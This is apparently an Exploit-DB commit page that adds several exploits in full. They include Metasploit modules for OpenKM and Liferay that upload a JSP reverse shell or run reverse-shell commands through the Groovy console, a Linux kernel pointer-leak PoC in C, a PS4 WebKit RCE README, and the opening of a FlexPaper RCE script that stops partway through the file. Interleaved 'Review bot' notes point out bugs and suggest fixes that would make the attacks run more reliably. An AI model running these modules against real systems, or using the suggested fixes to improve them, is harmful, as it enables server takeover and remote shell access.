DB: 2019-03-12

10 changes to exploits/shellcodes

Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak
Sony Playstation 4 (PS4) < 6.20 - WebKit Code Execution (PoC)
NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)
Liferay CE Portal < 7.1.2 ga3 - Remote Command Execution (Metasploit)
OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)
PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution
Flexpaper PHP Publish Service 2.3.6 - Remote Code Execution

Linux/x86 - MMX-XOR Encoder / Decoder execve(/bin/sh) Shellcode (44 bytes)
Linux/x86 - Polymorphic execve(/bin/sh) Shellcode (63 bytes)
This commit is contained in:
Offensive Security 2019-03-12 05:01:58 +00:00
parent 790ba4b35e
commit ce1901fc4f
12 changed files with 1219 additions and 1 deletions


@ -0,0 +1,73 @@
PS4 6.20 WebKit Code Execution PoC
==============
This repo contains a proof-of-concept (PoC) RCE exploit targeting the PlayStation 4 on firmware 6.20 leveraging CVE-2018-4441. The exploit first establishes an arbitrary read/write primitive as well as an arbitrary object address leak in `wkexploit.js`. It will then setup a framework to run ROP chains in `index.html` and by default will provide two hyperlinks to run test ROP chains - one for running the `sys_getpid()` syscall, and the other for running the `sys_getuid()` syscall to get the PID and user ID of the process respectively.
Each file contains a comment at the top giving a brief explanation of what the file contains and how the exploit works. Credit for the bug discovery is to lokihardt from Google Project Zero (p0). The bug report can be found [here](https://bugs.chromium.org/p/project-zero/issues/detail?id=1685&desc=2).
Note: It's been patched in the 6.50 firmware update.
Files
==============
Files in order by name alphabetically;
* `index.html` - Contains post-exploit code, going from arb. R/W -> code execution.
* `rop.js` - Contains a framework for ROP chains.
* `syscalls.js` - Contains an (incomplete) list of system calls to use for post-exploit stuff.
* `wkexploit.js` - Contains the heart of the WebKit exploit.
Notes
==============
* This vulnerability was patched in 6.50 firmware!
* This only gives you code execution in **userland**. This is **not** a jailbreak nor a kernel exploit, it is only the first half.
* This exploit targets firmware 6.20. It should work on lower firmwares however the gadgets will need to be ported, and the `p.launchchain()` method for code execution may need to be swapped out.
* In my tests the exploit as-is is pretty stable, but it can become less stable if you add a lot of objects and such into the exploit. This is part of the reason why `syscalls.js` contains only a small number of system calls.
Usage
==============
Setup a web-server hosting these files on localhost using xampp or any other program of your choosing. Additionally, you could host it on a server. You can access it on the PS4 by either;
1) Fake DNS spoofing to redirect the manual page to the exploit page, or
2) Using the web browser to navigate to the exploit page (not always possible).
Vulnerability Credit
==============
I wrote the exploit however I did not find the vulnerability, as mentioned above the bug (CVE-2018-4441) was found by lokihardt from Google Project Zero (p0) and was disclosed via the Chromium public bug tracker.
Resources
==============
[Chromium Bug Report](https://bugs.chromium.org/p/project-zero/issues/detail?id=1685&desc=2) - The vulnerability.
[Phrack: Attacking JavaScript Engines by saelo](http://www.phrack.org/papers/attacking_javascript_engines.html) - A life saver. Exploiting this would have been about 1500x more difficult without this divine paper.
Thanks
==============
lokihardt - The vulnerability
st4rk - Help with the exploit
qwertyoruiop - WebKit School
saelo - Phrack paper
Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46522.zip
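Review bot: the 6.50 patch statement appears twice, as the intro's `Note: It's been patched in the 6.50 firmware update.` and again as the first bullet under Notes; keep one and state the affected range in one place (targets 6.20, lower firmwares need the gadgets and `p.launchchain()` ported, fixed in 6.50), since the intro and the Notes bullets currently split that information. Minor wording in the Usage section: `Setup a web-server` should read `Set up a web server`, and the list lead-ins under Files and Usage end with `;` where `:` is meant.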

exploits/jsp/webapps/46526.rb Executable file

@ -0,0 +1,282 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenKM Document Management < 6.3.7 - (Authenticated) Remote Command Execution',
'Description' => %q{
Versions of the OpenKM Document Management < 6.3.7 allows upload a malicious
JSP file into the "/okm:root" directories and move that file to the home directory of the site.
This vulnerability is carried out by interfering to the "Filesystem path" control in the admin's "Export" field.
As a result, attackers can gain remote code execution through the application server with root privilege.
This module allows the execution of remote commands on the server by creating a malicious JSP file.
Module has been tested successfully with OpenKM DM between 6.3.2 and 6.3.7 on Debian 4.9.18-1kali1 system.
There is also the possibility of working in lower versions.
},
'Author' => [ 'AkkuS <Özkan Mustafa Akkuş>' ], # Vulnerability Discovery, PoC & Msf Module
'References' =>
[
['URL', 'https://pentest.com.tr/exploits/OpenKM-DM-6-3-7-Remote-Command-Execution-Metasploit.html']
],
'DisclosureDate' => "March 09 2019",
'License' => MSF_LICENSE,
'Platform' => %w{ linux win },
'Targets' =>
[
[ 'Automatic',
{
'Arch' => ARCH_JAVA,
'Platform' => 'linux'
}
],
[ 'Java Windows',
{
'Arch' => ARCH_JAVA,
'Platform' => 'win'
}
],
[ 'Java Linux',
{
'Arch' => ARCH_JAVA,
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => { 'PAYLOAD' => 'java/jsp_shell_reverse_tcp' }))
register_options(
[
Opt::RPORT(8080),
OptBool.new('SSL', [true, 'Use SSL', false]),
OptString.new('TARGETURI', [true, 'The base path to OpenKM', '/']),
OptString.new('USERNAME', [true, 'User to login with', 'okmAdmin']),
OptString.new('PASSWORD', [true, 'Password to login with', 'admin']),
], self.class)
end
##
# Request to Login
##
def login
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, "/OpenKM/j_spring_security_check"),
'vars_post' => {
"j_username" => datastore['USERNAME'],
"j_password" => datastore['PASSWORD'],
"submit" => "Login"
}
})
if res and res.code == 302 and res.headers['Location'] =~ /error/
fail_with(Failure::NoAccess, "Failed to login!")
else
print_good("Login successful.")
end
return res
end
##
# Returns the SSL, Host and Port as a string
##
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
##
# Vulnerablity Check
##
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, "/OpenKM/admin/home.jsp"),
'headers' =>
{
'Cookie' => login.get_cookies,
}
})
version = res.body.split('Version: ')[1].split('</td>')[0]
print_status("Version: #{version}")
if res and res.code == 200 and res.body =~ /Version: 6./ or res.body =~ /Version: 5./
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
return res
end
def exploit
get_cookie = login.get_cookies
cookie = get_cookie
print_status("Cookie: #{cookie}")
##
# Read to X-GWT-Permutation string
##
print_status("Attempting to read X-GWT-Permutation...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, "/OpenKM/frontend/frontend.nocache.js"),
'headers' =>
{
'Cookie' => cookie,
}
})
cache = res.body.split('Wb=')[1].split("'")[1]
print_good("X-GWT-Permutation: #{cache}")
##
# Create directory for payload
##
print_status("Attempting to create directory for payload...")
dfile = "#{rand_text_alphanumeric(rand(5) + 5)}akkus"
string = Rex::Text.rand_text_alphanumeric(10)
data = "7|0|7|#{peer}/OpenKM/frontend/|"
data << "#{cache}"
data << "|com.openkm.frontend.client.service.OKMFolderService|create|java.lang.String/"
data << "#{string}"
data << "|#{dfile}|/okm:root|1|2|3|4|2|5|5|6|7|"
res = send_request_cgi({
'method' => 'POST',
'data' => data,
'uri' => normalize_uri(target_uri, "/OpenKM/frontend/Folder"),
'headers' =>
{
'Content-Type' => 'text/x-gwt-rpc; charset=utf-8',
'X-GWT-Permutation' => cache,
'X-GWT-Module-Base' => '#{peer}/OpenKM/frontend/',
'Referer' => '#{peer}/OpenKM/frontend/index.jsp',
'Cookie' => cookie,
}
})
if res and res.code == 200 and res.body =~ /akkus/
print_good("#{dfile} directory successfully created!")
else
print_error("Directory could not be created!")
return res
end
##
# Upload JSP payload
##
pfile = "#{rand_text_alphanumeric(rand(5) + 5)}akkus.jsp"
boundary = Rex::Text.rand_text_alphanumeric(29)
data = "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n/okm:root/#{dfile}\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\n0\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"rename\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"comment\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"mails\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"users\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"roles\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"message\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"increaseVersion\"\r\n\r\n0\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"uploadFormElement\"; filename=\"#{pfile}\""
data << "\r\nContent-Type: application/octet-stream\r\n\r\n"
data << payload.encoded
data << "\n\r\n-----------------------------{boundary}--\r\n"
print_status("Attempting to upload JSP Payload...")
res = send_request_cgi({
'method' => 'POST',
'data' => data,
'uri' => normalize_uri(target_uri, "/OpenKM/frontend/FileUpload"),
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}',
'Referer' => '#{peer}/OpenKM/frontend/index.jsp',
'Cookie' => cookie,
}
})
if res and res.code == 200 and res.body =~ /akkus.jsp/
print_good("#{pfile} payload uploaded successfully!")
else
print_error("JSP Payload upload failed!")
end
##
# Read Tomcat web directory path
##
print_status("Attempting to read Tomcat web directory path...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, "/OpenKM/admin/system_properties.jsp"),
'headers' =>
{
'Cookie' => cookie,
}
})
dir = res.body.split('catalina.base')[1].split('<td>')[1].split(' ')[0]
path = "#{dir}/webapps/OpenKM"
print_good("Web directory path => #{path}")
##
# Move the payload file to the site's home directory
##
print_status("Attempting to move payload file to the site's home directory...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, "/OpenKM/admin/repository_export.jsp?repoPath=%2Fokm%3Aroot%2F#{dfile}&fsPath=" + URI.encode(path, /\W/)),
'headers' =>
{
'Cookie' => cookie,
}
})
if res and res.code == 200 and res.body =~ /akkus/
print_good("JSP Payload was moved successfully!")
print_status("=> #{path}/#{pfile} ")
else
print_error("JSP Payload upload failed!")
end
##
# Execute the Payload
##
print_status("Attempting to execute the #{pfile} payload...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, "/OpenKM/#{pfile}"),
'headers' =>
{
'Cookie' => cookie,
}
})
if res and res.code == 200
print_good("Payload executed successfully!")
else
fail_with(Failure::PayloadFailed, "Failed to execute the payload!")
end
end
end
##
# End
##
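Review bot: the single-quoted header values in the folder-create and `FileUpload` requests never interpolate, so `'X-GWT-Module-Base' => '#{peer}/OpenKM/frontend/'` and both `'Referer' => '#{peer}/OpenKM/frontend/index.jsp'` lines send the literal text `#{peer}`; use double quotes. The multipart body has the same class of bug: `boundary` is generated with `rand_text_alphanumeric(29)` but every `-----------------------------{boundary}` line and the `Content-Type` header omit the `#`, so the boundary is the fixed string `{boundary}` (it works only because both sides agree on it, and it makes the request trivially signature-able for defenders). In `check`, `res.body.split('Version: ')` runs before `res` is tested, the `and ... or` mix means a nil `res` still reaches `res.body =~ /Version: 5./`, `/Version: 6./` also marks the fixed 6.3.7 release vulnerable despite the `< 6.3.7` in the module name, and the trailing `return res` is unreachable. After the upload step (`print_error("JSP Payload upload failed!")`) and the move step the module continues instead of calling `fail_with`, and the move step's error text is copy-pasted from the upload step. Minor: `URI.encode` is removed in Ruby 3 (use `Rex::Text.uri_encode`), and defining `peer` shadows the framework helper of the same name used in log output.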

exploits/linux/dos/46529.c Normal file

@ -0,0 +1,137 @@
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <asm/unistd_64.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sound/asound.h>
# Exploit Title: Linux Kernel 4.4 (Ubuntu 16.04) - Leak kernel pointer in snd_timer_user_ccallback()
# Google Dork: -
# Date: 2019-03-11
# Exploit Author: wally0813
# Vendor Homepage: -
# Software Link: -
# Version: Linux Kernel 4.4 (Ubuntu 16.04)
# Tested on: ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
# CVE: CVE-2016-4578
# Category: Local
/*
* [ Briefs ]
* - If snd_timer_user_ccallback() doesn't initialize snd_timer_tread.event and snd_timer_tread.val, they are leaked by snd_timer_user_read()
* - This is local exploit against the CVE-2016-4578.
*
* [ Tested version ]
* - 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
*
* [ Prerequisites ]
* -
*
* [ Goal ]
* - Leak 4 bytes kernel pointer address using snd_timer_user_ccallback()
*
* [ Run exploit ]
* - $ gcc -o poc poc.c
* - $ sudo ./poc
* leak_value(event) : ffff8800
* leak_value(val) : ffffffff
*
* [ Contact ]
* - soyeoni0813@gmail.com
*/
int fd;
void leak(){
struct snd_timer_tread td;
struct snd_timer_select st;
struct snd_timer_params ps;
int r;
unsigned int leak_value_e, leak_value_v;
int tread;
memset(&td,0,sizeof(td));
memset(&st,0,sizeof(st));
memset(&ps,0,sizeof(ps));
// set tread
tread = 1;
ps.filter |= 1<<SNDRV_TIMER_EVENT_START;
ps.ticks = 1000 * 1000;
r = ioctl(fd, SNDRV_TIMER_IOCTL_TREAD, &tread);
if (r) {
printf("SNDRV_TIMER_IOCTL_TREAD error : %d, %s\n", errno, strerror(errno));
return;
}
// vuln trigger
st.id.dev_class = SNDRV_TIMER_CLASS_GLOBAL;
st.id.dev_sclass = SNDRV_TIMER_SCLASS_APPLICATION;
r = ioctl(fd, SNDRV_TIMER_IOCTL_SELECT, &st);
if (r) {
printf("SNDRV_TIMER_IOCTL_SELECT error : %d, %s\n", errno, strerror(errno));
return;
}
r = ioctl(fd, SNDRV_TIMER_IOCTL_PARAMS, &ps);
if (r) {
printf("SNDRV_TIMER_IOCTL_PARAMS error : %d, %s\n", errno, strerror(errno));
return;
}
r = ioctl(fd, SNDRV_TIMER_IOCTL_START);
if (r) {
printf("SNDRV_TIMER_IOCTL_START error : %d, %s\n", errno, strerror(errno));
return;
}
// get leak
r = read(fd, &td, sizeof(td));
leak_value_e = *((unsigned long *)(&td.event+1));
printf("leak_value(event) : %lx\n", leak_value_e);
leak_value_v = *((unsigned long *)(&td.val+1));
printf("leak_value(val) : %lx\n", leak_value_v);
}
int main(int argc, char **argv)
{
fd = open("/dev/snd/timer", O_RDWR);
if (fd < 0) {
printf("open error : %d, %s\n", errno, strerror(errno));
return -1;
}
leak();
close(fd);
return 0;
}
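Review bot: as rendered, the `# Exploit Title: ...` through `# Category: Local` header lines sit between the `#include`s and the `/* [ Briefs ] */` block as bare preprocessor lines, which the `gcc -o poc poc.c` command in the header will reject as invalid directives; they belong inside the comment block. In `leak()`, `leak_value_e` and `leak_value_v` are declared `unsigned int` but assigned from `*((unsigned long *)(&td.event+1))` and printed with `%lx`, so the value is silently truncated to 32 bits and the format does not match its argument; declare them `unsigned long` if the full 8 bytes are wanted, or read through `uint32_t` and print with `%x` if the 4-byte output shown in the header is the intent. The `read(fd, &td, sizeof(td))` result is stored in `r` but never checked, so a short or failed read prints the zeroed struct as if it were a leak. `<sys/stat.h>` is included twice, and the file is filed under `exploits/linux/dos/` although it is an information leak, as the commit summary itself says. For context, CVE-2016-4578 is uninitialized `snd_timer_tread` fields being copied to userspace by `snd_timer_user_read()`; the upstream fix zero-fills that record in `snd_timer_user_ccallback()` before queuing it, which is exactly what this PoC probes.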


@ -0,0 +1,266 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Liferay CE Portal Tomcat < 7.1.2 ga3 - Groovy-Console Remote Command Execution',
'Description' => %q{
This module uses the Liferay CE Portal Groovy script console to execute
OS commands. The Groovy script can execute commands on the system via a [command].execute() call.
Valid credentials for an application administrator user account are required
This module has been tested successfully with Liferay CE Portal Tomcat 7.1.2 ga3 on Debian 4.9.18-1kali1 system.
},
'Author' =>
[
'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://pentest.com.tr/exploits/Liferay-CE-Portal-Tomcat-7-1-2-ga3-Groovy-Console-Remote-Command-Execution-Metasploit.html' ],
],
'Privileged' => false,
'Platform' => [ 'unix' ],
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'reverse perl ruby python',
}
},
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Liferay CE Portal Tomcat < 7.1.2 ga3', { }]
],
'DisclosureDate' => 'March 08, 2019',
'DefaultTarget' => 0,
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' }))
register_options(
[
Opt::RPORT(8080),
OptString.new('USERNAME', [ true, 'The username to authenticate as' ]),
OptString.new('PASSWORD', [ true, 'The password for the specified username', ]),
OptString.new('PATH', [ true, 'The URI path of the portal', '/' ]),
], self.class)
end
##
# Version and Vulnerability Check
##
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['PATH'] + 'web/guest/home'
})
version = res.headers['Liferay-Portal']
print_status("Target: #{version}")
if res and res.code == 200 and version =~ /Portal 7./ or version =~ /Portal 6./
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
return res
end
##
# Returns the SSL, Host and Port as a string
##
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
def exploit
##
# Login and cookie information gathering
##
print_status('Attempting to login with specified user...')
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['PATH'] + 'web/guest/home'
})
authtoken = res.body.split('Liferay.authToken=')[1].split(';')[0].split('Liferay.authToken=')[0].split('"')[1]
print_status("Liferay AuthToken = #{authtoken}")
sessionid = 'JSESSIONID=' << res.headers['set-cookie'].split('JSESSIONID=')[1].split('; ')[0]
cookie = "#{sessionid}; COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US"
print_status("#{sessionid}")
boundary = Rex::Text.rand_text_alphanumeric(29)
data = "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_formDate\"\r\n\r\n"
data << ""
data << "\r\n-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_saveLastPath\"\r\n\r\nfalse\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_redirect\"\r\n\r\n\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_doActionAfterLogin\"\r\n\r\nfalse\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_login\"\r\n\r\n"
data << "#{datastore['USERNAME']}"
data << "\r\n-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_password\"\r\n\r\n"
data << "#{datastore['PASSWORD']}"
data << "\r\n-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"_com_liferay_login_web_portlet_LoginPortlet_checkboxNames\"\r\n\r\nrememberMe\r\n"
data << "-----------------------------{boundary}"
data << "\r\nContent-Disposition: form-data; name=\"p_auth\"\r\n\r\n"
data << "#{authtoken}"
data << "\r\n-----------------------------{boundary}--\r\n"
res = send_request_cgi({
'method' => 'POST',
'uri' => datastore['PATH'] + 'web/guest/home?p_p_id=com_liferay_login_web_portlet_LoginPortlet&p_p_lifecycle=1&p_p_state=exclusive&p_p_mode=view&_com_liferay_login_web_portlet_LoginPortlet_javax.portlet.action=%2Flogin%2Flogin&_com_liferay_login_web_portlet_LoginPortlet_mvcRenderCommandName=%2Flogin%2Flogin',
'data' => data,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}',
},
'cookie' => cookie
})
if res.code == 302
print_good('User authentication was successful.')
else
print_error('Something went wrong! Login failed.')
end
cookie1 = ''
for cookie1_i in [ 'JSESSIONID=', 'COMPANY_ID=', 'ID=' ]
cookie1 << cookie1_i + res.headers['set-cookie'].split(cookie1_i)[1].split('; ')[0] + '; '
end
cookies0 = "#{cookie1} COOKIE_SUPPORT=true;"
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['PATH'] + 'c',
'cookie' => cookies0
})
##
# Completion of the cookie information
##
cookie2 = ''
for cookie2_i in [ 'GUEST_LANGUAGE_ID=', 'Max-Age=', 'Expires=', 'Path=' ]
cookie2 << cookie2_i + res.headers['set-cookie'].split(cookie2_i)[1].split('; ')[0] + '; '
end
cookies = "#{cookie1} #{cookie2} COOKIE_SUPPORT=true;"
if cookies =~ /ID=/
print_good("Cookies information has been verified.")
else
print_error("Cookies information could not be verified!")
exit 0
end
##
# Request to Groovy script authtoken
##
res = send_request_cgi({
'method' => 'GET',
'uri' => datastore['PATH'] + 'group/control_panel/manage?p_p_id=com_liferay_server_admin_web_portlet_ServerAdminPortlet&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_com_liferay_server_admin_web_portlet_ServerAdminPortlet_mvcRenderCommandName=%2Fserver_admin%2Fview&_com_liferay_server_admin_web_portlet_ServerAdminPortlet_tabs1=script',
'headers' =>
{
'Referer' => '#{peer}/group/control_panel/manage?p_p_id=com_liferay_server_admin_web_portlet_ServerAdminPortlet&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_com_liferay_server_admin_web_portlet_ServerAdminPortlet_mvcRenderCommandName=%2Fserver_admin%2Fview&_com_liferay_server_admin_web_portlet_ServerAdminPortlet_tabs1=script',
},
'cookie' => cookies
})
##
# Calling authtoken to Groovy script
##
authtoken2 = res.body.split('Liferay.authToken=')[1].split(';')[0].split('Liferay.authToken=')[0].split('"')[1]
print_status("Liferay AuthToken to Shell = #{authtoken2}")
##
# Payload Separation **cmd/unix/reverse|reverse_ruby|reverse_python|reverse_perl**
##
if payload.encoded =~ /sh/
cmd = payload.encoded.split('sh -c')[1].split("'")[1]
pay = "'sh', '-c', '#{cmd}'"
print_good("Reverse payload was prepared")
elsif payload.encoded =~ /perl/
cmd = payload.encoded.split('perl -MIO -e')[1].split("'")[1]
pay = "'perl', '-MIO', '-e', '#{cmd}'"
print_good("Reverse Perl payload was prepared")
elsif payload.encoded =~ /python/
cmd = payload.encoded.split('python -c "exec(')[1].split(".decode('base64'))\"")[0].split("'")[1]
pay = "'python', '-c', 'exec(\"#{cmd}\".decode(\"base64\"))'"
print_good("Reverse Python payload was prepared")
elsif payload.encoded =~ /ruby/
cmd = payload.encoded.split('ruby -rsocket -e ')[1].split("'")[1]
pay = "'ruby', '-rsocket', '-e', '#{cmd}'"
print_good("Reverse Ruby payload was prepared")
else
print_error("! Please choose payload one of cmd/unix/reverse|reverse_ruby|reverse_python|reverse_perl ")
exit 0
end
##
# Post Data to run Payload
##
cmdata = "-----------------------------{boundary}"
cmdata << "\r\nContent-Disposition: form-data; name=\"_com_liferay_server_admin_web_portlet_ServerAdminPortlet_formDate\"\r\n\r\n"
cmdata << ""
cmdata << "\r\n-----------------------------{boundary}"
cmdata << "\r\nContent-Disposition: form-data; name=\"_com_liferay_server_admin_web_portlet_ServerAdminPortlet_tabs1\"\r\n\r\n"
cmdata << "script\r\n-----------------------------{boundary}"
cmdata << "\r\nContent-Disposition: form-data; name=\"_com_liferay_server_admin_web_portlet_ServerAdminPortlet_redirect\"\r\n\r\n"
cmdata << "#{peer}/group/control_panel/manage?p_p_id="
cmdata << "com_liferay_server_admin_web_portlet_ServerAdminPortlet&p_p_lifecycle="
cmdata << "0&p_p_state=maximized&p_p_mode=view&_com_liferay_server_admin_web_portlet_"
cmdata << "ServerAdminPortlet_mvcRenderCommandName=%2Fserver_admin%2Fview&_com_liferay_"
cmdata << "server_admin_web_portlet_ServerAdminPortlet_cur=""0&_com_liferay_server_"
cmdata << "admin_web_portlet_ServerAdminPortlet_tabs1=script"
cmdata << "\r\n-----------------------------{boundary}"
cmdata << "\r\nContent-Disposition: form-data; name=\"_com_liferay_server_admin_web_portlet_ServerAdminPortlet_language\"\r\n\r\n"
cmdata << "groovy"
cmdata << "\r\n-----------------------------{boundary}"
cmdata << "\r\nContent-Disposition: form-data; name=\"_com_liferay_server_admin_web_portlet_ServerAdminPortlet_script\"\r\n\r\n"
cmdata << "def cmd = [#{pay}]"
cmdata << "\r\ncmd.execute()"
cmdata << "\r\n-----------------------------{boundary}"
cmdata << "\r\nContent-Disposition: form-data; name=\"_com_liferay_server_admin_web_portlet_ServerAdminPortlet_cmd\"\r\n\r\n"
cmdata << "runScript"
cmdata << "\r\n-----------------------------{boundary}"
cmdata << "\r\nContent-Disposition: form-data; name=\"p_auth\"\r\n\r\n"
cmdata << "#{authtoken2}"
cmdata << "\r\n-----------------------------{boundary}--\r\n"
##
# Request to get reverse shell
##
print_status("Attempting to execute the payload...")
res = send_request_cgi({
'method' => 'POST',
'uri' => datastore['PATH'] + 'group/control_panel/manage?p_p_id=com_liferay_server_admin_web_portlet_ServerAdminPortlet&p_p_lifecycle=1&p_p_state=maximized&p_p_mode=view&_com_liferay_server_admin_web_portlet_ServerAdminPortlet_javax.portlet.action=%2Fserver_admin%2Fedit_server',
'data' => cmdata,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}',
'Referer' => '#{peer}/group/control_panel/manage?p_p_id=com_liferay_server_admin_web_portlet_ServerAdminPortlet&p_p_lifecycle=0&p_p_state=maximized&p_p_mode=view&_com_liferay_server_admin_web_portlet_ServerAdminPortlet_mvcRenderCommandName=%2Fserver_admin%2Fview&_com_liferay_server_admin_web_portlet_ServerAdminPortlet_tabs1=script',
},
'cookie' => cookies
})
if res.code == 302
print_good('Payload was successfully executed.')
else
print_error('Something went wrong!')
end
end
end
##
# End
##
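Review bot: `exit 0` in the cookie-verification branch and in the payload-selection `else` branch terminates the whole msfconsole process; use `fail_with(Failure::Unknown, ...)` and `fail_with(Failure::BadConfig, ...)`. As in the OpenKM module in this commit, both `'Referer' => '#{peer}/group/control_panel/manage?...'` headers are single-quoted so `#{peer}` is sent literally, and `boundary` is generated but the body and `Content-Type` use the fixed string `{boundary}`. In `check`, `res.headers['Liferay-Portal']` is read before `res` is tested, the `and ... or` precedence lets a nil `res` reach the `or` clause, `/Portal 7./` flags every 7.x build including patched ones despite the `< 7.1.2 ga3` title, and `return res` after the `if` is dead code. The payload dispatch tests `payload.encoded =~ /sh/` first, which any encoded payload that happens to contain `sh` (for example inside the python branch's base64 text) satisfies before the more specific branches; switch on `datastore['PAYLOAD']` instead. The login-failure branch prints an error and keeps going, and `res.headers['set-cookie'].split(cookie1_i)[1].split('; ')` raises `NoMethodError` rather than a readable error when a cookie is absent. Minor: `require 'msf/core'` is no longer needed in modules, and `for ... in` should be `each`.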

exploits/php/webapps/46528.py Executable file

@ -0,0 +1,70 @@
#!/usr/bin/env python
#Exploit Title: FlexPaper PHP Publish Service <= 2.3.6 RCE
#Date: March 2019
#Exploit Author: Red Timmy Security - redtimmysec.wordpress.com
#Vendor Homepage: https://flowpaper.com/download/
#Version: <= 2.3.6
#Tested on: Linux/Unix
#CVE : CVE-2018-11686
#Disclamer: This exploit is for educational purpose only
#More details on https://redtimmysec.wordpress.com/2019/03/07/flexpaper-remote-code-execution/
import sys
import requests
import readline
import urllib2
import ssl
try:
url = sys.argv[1]
except:
print "[-] usage $python shredpaper.py http://targert.com/flexpaper/"
print sys.exit(1)
print """
__ __
_____/ /_ ________ ____/ ____ ____ _____ ___ _____
/ ___/ __ \/ ___/ _ \/ __ / __ \/ __ `/ __ \/ _ \/ ___/
(__ / / / / / / __/ /_/ / /_/ / /_/ / /_/ / __/ /
/____/_/ /_/_/ \___/\__,_/ .___/\__,_/ .___/\___/_/
/_/ /_/
"""
print "[*] FlexPaper <= 2.3.6 Remote Command Execution - Red Timmy Security)"
print "[*] Attacking %s" %url
print "[*] Deleting target configuration file"
payload = (("SAVE_CONFIG","1"),("PDF_Directory","/var/www/html/flex2.3.6/flexpaper/pdf"),("SWF_Directory","config/"),("LICENSEKEY",""),("splitmode","1"),("RenderingOrder_PRIM","flash"),("RenderingOrder_SEC","html"))
url1 = url+"/php/change_config.php"
r1 = requests.post(url1, data=payload)
rx = requests.post(url1, data=payload) #resend
